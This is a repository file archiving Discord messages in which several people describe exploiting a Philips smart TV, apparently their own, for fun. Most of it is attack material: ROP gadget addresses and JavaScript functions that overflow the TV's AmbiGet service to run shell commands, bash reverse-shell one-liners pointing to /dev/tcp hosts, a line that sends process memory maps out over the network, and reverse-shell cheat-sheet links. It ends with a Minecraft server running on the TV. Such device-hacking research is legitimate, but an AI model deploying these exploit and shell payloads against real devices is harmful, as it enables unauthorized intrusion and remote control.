Sunpy/Philips_TV
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity
master
Philips_TV/files/28_apr_2020/discord.md

304 lines
10 KiB
Markdown
Raw Permalink Normal View History

Yes... I forgot to commit during writeups etc.
2020-04-29 16:58:59 +02:00
# Discord messages of interest
Development was a mix of text messages and voice chat, but here are some messages to indicate how we progressed over time.
> ok so I found some stuff :^)
> ```// write primitive 4bytes
> // looks relatively safe to call (crashes with a 1 deref in strstr)
> PC = 0x23BCC
> R4 = address+0x880
> R11 = data
>
> // system call (SP buffer)
> PC = 0x15F3C or 0x15F70 or 0x15FA4 or 0x15FD8 // (latter = safer)
> R4 = R11 = unused
>
> // system call (R4 buffer)
> // looks super safe
> PC = 0x11D48 or 0x14108
> R4 = address of ascii string for system()
> R11 = unused
>
> // system call (R4 buffer) but probably unsafe
> PC = 0x2F3DC (super unsafe) or 0x2F52C
> R4 = address of ascii string for system()
> R11 = unused
> ```
> these are the useful gadgets
> there seems to be a memory area that stays static between runs, and is in a good address range
> thus it might be possible to use the write primitive to write a buffer for system there
> @Jan4V#0289
> You will still have to catch me up with what I should do though xd
> @Emily | Sunpy#5213
> can you send me the js you have for the AmbiGet?
> I wanna make a nicer setup for this and we can try
> @Jan4V#0289
> ```js
> new TV_JSP().tvServices.AmbiGet(0,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" +
> " >/tmp/b" + String.fromCharCode(0x70) + String.fromCharCode(0x5F) + String.fromCharCode(0x01)
> )
> ```
> @Emily | Sunpy#5213
> File: `exploit.js` (1.72 KB)
> this is the general idea
> but I wouldn't run this whole thing at first
> if/when you wanna mess with this mention me and I'll jump into voice
> @Jan4V#0289
> ``/dev/shm/shm_tmp/fusion.0.1``
> @Jan4V#0289
> File: `crashdump` (6.03 MB)
> @Emily | Sunpy#5213
> File: `crashdump` (181.60 KB)
> @Emily | Sunpy#5213
> ```js
> function executeShellcode(shellcode) {
> var payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
> payload += encodeInt(0x41414141);
> payload += encodeInt(0x42424242);
> payload += encodeInt(0x9EBA0404);
> for(let i = 0; i < 4194304; i++)
> {
> payload += encodeInt(0xE0A15005);
> }
> payload += shellcode;
> new TV_JSP().tvServices.AmbiGet(0, payload);
> }
> ```
> @Jan4V#0289
> http://shell-storm.org/blog/Shellcode-On-ARM-Architecture/
> @Emily | Sunpy#5213
> http://shell-storm.org/shellcode/files/shellcode-730.php
> @Jan4V#0289
> btw `"a".repeat(123)` is a thing
> @HoLLy#2750
> ```js
> function executeShellcode(shellcode) {
> var payload = "A".repeat(1036);
> payload += encodeInt(0x41414141);
> payload += encodeInt(0x42424242);
> payload += encodeInt(0x9EBA0404);
> for(let i = 0; i < 0x400000; i++)
> {
> payload += encodeInt(0xE0A15005);
> }
> payload += shellcode;
> new TV_JSP().tvServices.AmbiGet(0, payload);
> }
>
> executeShellcode(encodeInt(0xEF91337B));
> ```
> @Jan4V#0289
> File: `crashdump` (124.31 KB)
> @Emily | Sunpy#5213
>
> ```js
> function encodeInt(input) {
> return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF));
> }
> function executeCommand(command) {
> var payload = "A"*1036;
> payload += encodeInt(0x01011D48);
> payload += encodeInt(0x42424242);
> payload += encodeInt(0x9EBA0404);
> for(let i = 0; i < 0x400000; i++)
> {
> payload += encodeInt(0xE0A15005);
> }
> payload += encodeInt(0xE2444401);
> payload += encodeInt(0xE1A0B004);
> payload += encodeInt(0xE28F4008);
> payload += encodeInt(0xE1A0F00B);
> payload += encodeInt(0x41414141);
> payload += encodeInt(0x42424242);
> payload += command;
> new TV_JSP().tvServices.AmbiGet(0, payload);
> }
>
> executeCommand("touch /tmp/jan4v.txt");
> ```
> @Jan4V#0289
> File: `crashdump` (124.31 KB) (DUPLICATE: No crashdump was generated and I did not pay attention to timestamp)
> @Emily | Sunpy#5213
> ``/dev/shm/shm_tmp/fusion.0.1``
> @Jan4V#0289
> File: `crashdump` (6.03 MB)
> @Emily | Sunpy#5213
> File: `crashdump` (167.34 KB)
> @Emily | Sunpy#5213
> ```js
> function encodeInt(input) {
> return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF));
> }
>
> function execute(pc, r4, r11) {
> var payload = "A".repeat(1040);
> payload += encodeInt(r4);
> payload += encodeInt(r11);
> payload += encodeInt(pc);
> new TV_JSP().tvServices.AmbiGet(0, payload);
> }
>
> function writeMemory4(address, data)
> {
> execute(0x23BCC, address + 0x880, data);
> }
>
> function callSystem(address)
> {
> execute(0x11D48, address, 0x41414141);
> }
>
> writeMemory4(0x8a55f040, 0x7478742E);
> ```
> @Jan4V#0289
> I mean you could already pwn the browser
> I believe
> so you could make it display any web page
> and we can read/write a bunch of files on the fs
> but sunpy is too scared to overwrite a script and get a shell that way, so we're doing the obviously safer way of corrupting the stack and jumping to the middle of a function, in the hope we can run a shell command that way :^)
> @HoLLy#2750
> We couldn't overwrite the scripts though
> @Shaddy#4422
> when I say "we" I basically mean an
> we tried like 1 script lol
> @HoLLy#2750
> we dont have permissions to write to the file
> we only have permissions to tmp
> @Emily | Sunpy#5213
> there's multiple places that get executed
> probably more places too though
> @HoLLy#2750
> We've tried multiple places
> @Shaddy#4422
> if there's a file/folder with incorrect permissions
> @HoLLy#2750
> That's the less exciting exploit anyway :^)
> @Shaddy#4422
> I tried to look for a script that *may* be in tmp that gets executed as the people doesnt seem to be consistent
> but couldnt find any
> we have permissions to /3rd_rw aswell
> @Emily | Sunpy#5213
> im going to jump out the window
> we can write commands to an ini file in read/write area
> @Emily | Sunpy#5213
> ``bash -i >& /dev/tcp/10.0.0.1/4242 0>&1``
> @Jan4V#0289
> @Emily | Sunpy#5213 `( sleep 300 ; echo "80" > /sys/class/leds/blue/brightness ) &`
> @HoLLy#2750
> https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
> http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
> @HoLLy#2750
> `( sleep 6 ; bash -i >& /dev/tcp/192.168.2.134/4242 0>&1 ) &`
> @Emily | Sunpy#5213
> ``( sleep 30; cat /proc/*/maps > /dev/tcp/127.0.0.1/4242; ) &``
> @Jan4V#0289
> File: `crashdump` (268.85 KB)
> @Emily | Sunpy#5213
> ![Terminal-tmux](img/img0.png "img0")
> @HoLLy#2750
> ```js
> function encodeInt(input) {
> return String.fromCharCode((input & 0xFF), ((input >> 8) & 0xFF), ((input >> 16) & 0xFF), ((input >> 24) & 0xFF));
> }
>
> function execute(pc, r4, r11) {
> var payload = "A".repeat(1040);
> payload += encodeInt(r4);
> payload += encodeInt(r11);
> payload += encodeInt(pc);
> new TV_JSP().tvServices.AmbiGet(0, payload);
> }
>
> function callSystem(address)
> {
> execute(0x11D48, address, 0x41414141);
> }
>
> callSystem(0x9CF55588);
> ```
> @Jan4V#0289
> ![cmd - nc -nlvp 1337](img/img1.png "img1")
> @Emily | Sunpy#5213
> ``/3rd/bin/wget https://busybox.net/downloads/binaries/1.31.0-defconfig-multiarch-musl/busybox-armv7l``
> ![openbox commands](img/img2.png "img2")
> @Jan4V#0289
> ``mount -t devpts none /dev/pts``
> @Jan4V#0289
> ![terminal](img/img3.png "img3")
> @Emily | Sunpy#5213
> https://cdn.azul.com/zulu-embedded/bin/zulu8.44.0.213-ca-jdk1.8.0_242-linux_aarch32hf.tar.gz
> @Jan4V#0289
> https://betacraft.pl/server-archive/minecraft/
> @Jan4V#0289
> https://download.cuberite.org/linux-armhf-raspbian/Cuberite.tar.gz
> @Jan4V#0289
> ``LD_LIBRARY_PATH=/lib:/3rd_rw/server``
> https://cdn.azul.com/zulu-embedded/bin/zulu8.44.0.213-ca-jdk1.8.0_242-linux_aarch32sf.tar.gz
> @Jan4V#0289
> ![minecraft server start](img/img4.png "img4")
> ![minecraft server still starting](img/img5.png "img5")
> @Emily | Sunpy#5213
> 569043771063ns loadtime :D
> @Emily | Sunpy#5213
> ![minecraft server running](img/img6.png "img6")
> @Emily | Sunpy#5213
> ```
> AllowTcpForwarding remote
> AllowStreamLocalForwarding no
> GatewayPorts yes
> ```
> @Jan4V#0289
> > minecraft code execution
> > \- Holly
> @Emily | Sunpy#5213
Reference in New Issue Copy Permalink